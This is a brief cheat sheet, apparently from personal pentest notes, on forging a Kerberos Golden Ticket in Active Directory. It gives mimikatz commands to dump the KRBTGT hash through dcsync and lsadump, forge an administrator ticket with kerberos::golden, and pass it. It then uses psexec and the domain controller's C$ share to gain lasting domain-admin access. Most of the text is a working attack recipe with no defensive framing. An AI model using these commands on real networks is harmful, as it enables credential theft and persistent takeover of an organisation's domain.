Golden Ticket

Check if you're in the right priv

psexec.exe \\dc_name cmd.exe 

if this won't work then this won't work.

What you need:

  1. Domain name:

  2. SID:

whoami /user

3. KRBTGT NTLM Hash: (requires elevated priv) -> if we can obtain this, we can create our own TGT

  • non-priv user is the member of the Domain Admin's group ---> DC will trust it if encrypted correctly

  • The password hash doesn't change automatically, meaning there's a good chance that the old tickets are somewhere in the system!

run mimikatz


dcsync /domain:domainname.local /user:krbtgt
lsadump::lsa /patch 

copy Hash NTLM value.


Use golden ticket to get an access to a domain group with the information you got!

on mimikatz command,

kerberos::golden /domain:domain.local /sid:SID_Value  /rc4:NTLM_HASH /id:500 /user:gori
  • id value- pass in the id that you want to create an account for -> 500 - admin

  • /user -> name it whatever!

After you create an account, pass the ticket

keberos::ptt ticket.kirbi

if you launch a command prompt now


you will have priv of admin! You can access domain controllers file shares (and it doesn't expire for a long time!!!)

pushd \\domain_Controller\c$


psexec.exe \\dc01 cmd.exe 

to launch a command prompt with the newly created DC account.

check your group memberships

whoami /groups 

Last updated